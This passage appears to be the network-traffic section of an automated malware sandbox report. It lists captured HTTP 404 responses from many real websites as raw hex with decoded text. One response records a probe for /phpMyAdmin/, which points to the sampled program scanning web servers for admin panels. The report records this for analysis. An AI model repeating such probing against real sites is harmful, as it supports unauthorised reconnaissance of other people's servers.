ff fe 4f 00 e7 f3 f9 fd da e1 45 ac c7 3e 99 a3 17 ff c6 df 87 fc 38 82 2e b1 90 56 fb d5 3f 5c a4 f7 f5 09 7e 09 b5 5b 9f e2 4b d5 17 4a e6 7a 98 f0 16 9a ef 70 a0 83 83 3d 34 86 4c 42 29 de 87 e2 59 f9 0f 1c 1e 79 ae e1 75 d6 46 f9 eb c1 c1 b7 e2 4d 84 de ae e6 01 ff fb d6 eb 05 59 87 e9 a4 b9 df 1e bf 62 f7 f3 f3 05 3b eb 1a 85 43 e9 d8 83 64 b4 35 f1 5b 07 26 54 57 a4 ef 13 52 64 86 7b 2f 5f 1d 1c 6c 0e fb 79 e7 b0 6f 04 cf d1 59 27 0c 2b 02 f1 c5 11 47 87 3b 47 fc 8b fe af 8d 5c 84 e0 fd 3f 7a fe c5 4a 4c c8 39 2a 19 e5 7e 22 92 bb dc 50 ad d3 be 2c 45 8e c3 da a8 a7 4f a2 24 97 7d db d8 28 ac d9 88 4f b6 57 06 b9 cc 9e 3c 1b ad dd 32 58 21 b7 53 53 f7 b4 51 c8 a2 d5 72 78 fc ed e5 cc c4 e7 4f ab fd 85 1e 78 1e 22 0e df 23 a8 44 9a 4a 9d 0f e1 b0 4d be fd 19 41 a2 50 98 21 33 2d be 75 9a 48 12 32 a9 e4 36 ac c2 81 17 07 3f 8e a0 95 01 bf 3c 67 ec 11 94 52 f7 3b 31 3c ad 5d ea 98 1d 80 a8 1d 8d c0 e1 dc f5 39 c6 9c d7 12 06 47 f3 dd 24 a0 56 70 bf 8e a3 30 73 df 8f 42 bb 51 1e 3d fa 66 04 25 61 db 90 e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Fri, 22 Dec 2023 20:14:53 GMTContent-Length: 4962Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://oceanictrailers.com.au/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Fri, 22 Dec 2023 20:14:53 GMTData Raw: 31 31 39 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 5b 6d 73 db b6 b2 fe 1c cf f4 3f d0 cc 54 21 1b 90 22 a9 57 53 51 3a e7 a4 e9 9d 73 a7 bd 39 d3 34 73 3f c4 9d 0c 44 2e 25 26 14 c1 02 a0 25 1f 55 ff fd 0e 00 be 89 a2 2c c5 4e af 27 b1 2d 70 f1 3c 8b c5 ee 02 58 d0 af ae 43 12 f0 fb 0c b4 15 5f 27 af bf bb 7a 25 7e 6a 09 4e 97 73 1d 52 eb c3 7b fd f5 77 57 a2 19 70 f8 fa bb ab 67 af d6 c0 b1 16 ac 30 65 c0 e7 fa 87 df 7f b6 a6 42 a4 78 90 e2 35 cc f5 bb 18 36 19 a1 5c d7 02 92 72 48 f9 5c df c4 21 5f cd 43 b8 8b 03 b0 e4 07 a4 c5 69 cc 63 9c 58 2c c0 09 cc 5d 05 93 c4 e9 17 8d 42 32 d7 33 4a a2 38 01 5d 5b 51 88 e6 fa 8a f3 8c f9 fd fe 72 9d 2d 6d 42 97 fd 6d 94 f6 5d d9 4b d0 f3 98 27 f0 fa df 78 09 5a 4a b8 16 91 3c 0d b5 de f3 a9 e7 ba 33 ed 5d 00 38 8d 03 ed 77 8a e3 04 28 7b d5 57 e2 57 6a 38 52 eb 17 94 2c 08 67 2f 2a 9d 5f ac f1 d6 8a d7 78 09 56 46 41 8c c9 4f 30 5d c2 0b ad ff fa ea 55 ad 27 4e 38 d0 14 73 d0 35 61 c9 b9 8e b3 2c 89 03 cc 63 92 f6 29 63 2f b7 eb 44 d7 24 e1 5c 6f 6b a2 f5 28 fe 33 27 33 ed 67 80 b0 3d 54 a2 d4 e6 85 d6 76 40 d6 36 ce fb 11 40 d8 d7 ff 16 2d de 90 f5 1a 52 ce be 46 9d a0 e8 d3 d4 8b 05 34 ce f8 eb ab 4d 9c 86 64 63 7f da 64 b0 26 9f e3 f7 c0 79 9c 2e 99 36 d7 76 fa 02 33 f8 40 13 dd 2f a6 f6 b6 7f db 67 f6 46 cc ed 6d 5f da 9d dd f6 03 42 e1 b6 2f 3b df f6 dd a1 ed d8 ce 6d 7f e2 6d 27 de 6d 5f 47 3a 6c b9 ee eb 76 96 2e 75 a4 b3 bb e5 e3 f0 d8 dd 52 a2 b1 bb e5 5b 05 c8 ee 24 20 c9 69 00 ba bf d3 03 92 06 98 4b 35 0a 7d 7d a1 6e f7 04 dd f6 37 99 15 a7 41 92 87 c0 6e fb 9f 99 6c 90 9d 2d 0a 09 60 06 f6 3a 4e ed cf ec c7 3b a0 f3 b1 3d b4 3d 7d bf 9f 5d f5 7f b8 d6 7e 5f c5 4c 13 7e af c5 4c c3 39 27 d6 12 52 a0 98 43 a8 fd d0 bf ba 8e f2 34 10 9e 65 c4 28 35 77 77 98 6a 04 31 04 b3 b2 5d 0b 0c 30 77 9c de cb 67 7c be 63 79 26 62 f1 77 60 9c f9 80 78 bc 06 c6 f1 3a f3 8d 14 36 da 4f 98 83 69 df e1 24 87 77 91 61 ee 67 0c 18 8b 49 fa 9e 13 8a 97 60 33 e0 ff e2 b0 36 08 fa ef f7 ef fe c7 66 9c c6 e9 32 8e ee 0d 6e 9a fb 00 f3 60 25 e8 f6 fb 8a 3e 33 00 71 a1 1a d8 41 02 98 fe 06 01 37 1c e4 20 b0 03 9c de 61 66 ab e8 af 3e ae 20 5e ae b8 89 c0 8e e2 24 f9 1d b6 dc e0 c8 41 8e 39 13 83 e3 73 a1 e5 87 38 e5 03 ef 1f 94 e2 7b 03 ec 25 f0 7f 89 b0 fc 09 73 7c 09 b4 1d 62 8e 4d 44 e7 c6 13 74 4a a5 4e e8 5b 69 63 ce 28 f0 9c a6 1a b7 e1 0e e8 bd 51 1a 50 98 cf dc 15 0f 61 3e 9f d3 8f fc 8f bd 59 1b 38 2f 0d cc 36 b1 30 3f 37 77 01 66 a0 47 09 5e ea 7e d1 31 35 00 e9 b7 79 38 1d 04 b7 79 18 45 83 db 3c 02 27 ba cd 3d c7 09 6f 73 6f 8c 27 aa 45 3f 29 b6 38 10 33 7f bc 76 fd eb 43 d8 30 c2 15 45 18 0d 9a 50 f2 9
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ai1u%2BbCUYOKeZLIBX%2Fh1FH%2Bbp50vIR34coLUAIm1FDxwjMTT68SlrzWRw3n8AMFvkNHVznSzqALxc11nLCb81098SialJ4gI%2BzkEX%2B9svHi9A5ae8Avm0RsdzrjuafMp"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 839b08a34a7674a6-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 37 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a Data Ascii: 7d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzIy%jaC]7X
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:53 GMTServer: ApacheX-Powered-By: PHP/8.1.26Cache-Control: no-cache, privateUpgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 39 34 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 0d 0a 3c 68 74 6d 6c 0d 0a 20 20 20 20 6c 61 6e 67 3d 22 65 6e 20 22 0d 0a 20 20 20 20 64 61 74 61 2d 74 65 78 74 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 0d 0a 20 20 20 20 63 6c 61 73 73 3d 22 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 49 73 6d 61 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 63 73 73 2f 63 75 73 74 6f 6d 2f 6c 6f 61 64 65 72 2e 63 73 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 6a 73 2f 63 6f 72 65 2f 73 63 72 69 70 74 73 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 76 65 6e 64 6f 72 73 2f 63 73 73 2f 76 65 6e 64 6f 72 73 2e 6d 69 6e 2e 63 73 73 22 20 2f 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 76 65 6e 64 6f 72 73 2f 63 73 73 2f 75 69 2f 70 72 69 73 6d 2e 6d 69 6e 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 76 65 6e 64 6f 72 73 2f 63 73 73 2f 65 78 74 65 6e 73 69 6f 6e 73 2f 73 77 65 65 74 61 6c 65 72 74 32 2e 6d 69 6e 2e 63 73 73 22 3e 0d 0a 0d 0a 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:54 GMTServer: ApacheContent-Length: 258Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 6f 6d 75 72 61 6d 62 61 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at omuramba.com Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Dec 2023 20:14:54 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 209Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /phpMyAdmin/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://oceanictrailers.com.au/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Fri, 22 Dec 2023 20:14:54 GMTData Raw: 31 31 39 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 5b 6d 73 db b6 b2 fe 1c cf f4 3f d0 cc 54 21 1b 90 22 a9 57 53 51 3a e7 a4 e9 9d 73 a7 bd 39 d3 34 73 3f c4 9d 0c 44 2e 25 26 14 c1 02 a0 25 1f 55 ff fd 0e 00 be 89 a2 2c c5 4e af 27 b1 2d 70 f1 3c 8b c5 ee 02 58 d0 af ae 43 12 f0 fb 0c b4 15 5f 27 af bf bb 7a 25 7e 6a 09 4e 97 73 1d 52 eb c3 7b fd f5 77 57 a2 19 70 f8 fa bb ab 67 af d6 c0 b1 16 ac 30 65 c0 e7 fa 87 df 7f b6 a6 42 a4 78 90 e2 35 cc f5 bb 18 36 19 a1 5c d7 02 92 72 48 f9 5c df c4 21 5f cd 43 b8 8b 03 b0 e4 07 a4 c5 69 cc 63 9c 58 2c c0 09 cc 5d 05 93 c4 e9 17 8d 42 32 d7 33 4a a2 38 01 5d 5b 51 88 e6 fa 8a f3 8c f9 fd fe 72 9d 2d 6d 42 97 fd 6d 94 f6 5d d9 4b d0 f3 98 27 f0 fa df 78 09 5a 4a b8 16 91 3c 0d b5 de f3 a9 e7 ba 33 ed 5d 00 38 8d 03 ed 77 8a e3 04 28 7b d5 57 e2 57 6a 38 52 eb 17 94 2c 08 67 2f 2a 9d 5f ac f1 d6 8a d7 78 09 56 46 41 8c c9 4f 30 5d c2 0b ad ff fa ea 55 ad 27 4e 38 d0 14 73 d0 35 61 c9 b9 8e b3 2c 89 03 cc 63 92 f6 29 63 2f b7 eb 44 d7 24 e1 5c 6f 6b a2 f5 28 fe 33 27 33 ed 67 80 b0 3d 54 a2 d4 e6 85 d6 76 40 d6 36 ce fb 11 40 d8 d7 ff 16 2d de 90 f5 1a 52 ce be 46 9d a0 e8 d3 d4 8b 05 34 ce f8 eb ab 4d 9c 86 64 63 7f da 64 b0 26 9f e3 f7 c0 79 9c 2e 99 36 d7 76 fa 02 33 f8 40 13 dd 2f a6 f6 b6 7f db 67 f6 46 cc ed 6d 5f da 9d dd f6 03 42 e1 b6 2f 3b df f6 dd a1 ed d8 ce 6d 7f e2 6d 27 de 6d 5f 47 3a 6c b9 ee eb 76 96 2e 75 a4 b3 bb e5 e3 f0 d8 dd 52 a2 b1 bb e5 5b 05 c8 ee 24 20 c9 69 00 ba bf d3 03 92 06 98 4b 35 0a 7d 7d a1 6e f7 04 dd f6 37 99 15 a7 41 92 87 c0 6e fb 9f 99 6c 90 9d 2d 0a 09 60 06 f6 3a 4e ed cf ec c7 3b a0 f3 b1 3d b4 3d 7d bf 9f 5d f5 7f b8 d6 7e 5f c5 4c 13 7e af c5 4c c3 39 27 d6 12 52 a0 98 43 a8 fd d0 bf ba 8e f2 34 10 9e 65 c4 28 35 77 77 98 6a 04 31 04 b3 b2 5d 0b 0c 30 77 9c de cb 67 7c be 63 79 26 62 f1 77 60 9c f9 80 78 bc 06 c6 f1 3a f3 8d 14 36 da 4f 98 83 69 df e1 24 87 77 91 61 ee 67 0c 18 8b 49 fa 9e 13 8a 97 60 33 e0 ff e2 b0 36 08 fa ef f7 ef fe c7 66 9c c6 e9 32 8e ee 0d 6e 9a fb 00 f3 60 25 e8 f6 fb 8a 3e 33 00 71 a1 1a d8 41 02 98 fe 06 01 37 1c e4 20 b0 03 9c de 61 66 ab e8 af 3e ae 20 5e ae b8 89 c0 8e e2 24 f9 1d b6 dc e0 c8 41 8e 39 13 83 e3 73 a1 e5 87 38 e5 03 ef 1f 94 e2 7b 03 ec 25 f0 7f 89 b0 fc 09 73 7c 09 b4 1d 62 8e 4d 44 e7 c6 13 74 4a a5 4e e8 5b 69 63 ce 28 f0 9c a6 1a b7 e1 0e e8 bd 51 1a 50 98 cf dc 15 0f 61 3e 9f d3 8f fc 8f bd 59 1b 38 2f 0d cc 36 b1 30 3f 37 77 01 66 a0 47 09 5e ea 7e d1 31 35 00 e9 b7 79 38 1d 04 b7 79 18 45 83 db 3c 02 27 ba cd 3d c7 09 6f 73 6f 8c 27 aa 45 3f 29 b6 38 10 33 7f bc 76 fd eb 43 d8 30 c2 15 45 18 0d 9a 50 f2 9
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:54 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://derrickandbriggs.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 32 30 63 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 44 65 72 72 69 63 6b 20 26 61 6d 70 3b 20 42 72 69 67 67 73 2c 20 4c 4c 50 44 65 72 72 69 63 6b 20 26 61 6d 70 3b 20 42 72 69 67 67 73 2c 20 4c 4c 50 3c 2f 74 69 74 6c 65 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 64 65 72 72 69 63 6b 61 6e 64 62 72 69 67 67 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6b 61 6e 64 69 6e 73 6b 79 2f 73 74 79 6c 65 2e 63 73 73 3f 76 3d 33 2e 32 22 20 2f 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 68 74 6d 6c 35 73 68 69 76 2f 33 2e 37 2e 33 2f 68 74 6d 6c 35 73 68 69 76 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 34 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 44 65 72 72 69 63 6b 20 26 61 6d 70 3b 20 42 72 69 67 67 73 2c 20 4c 4c 50 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 7
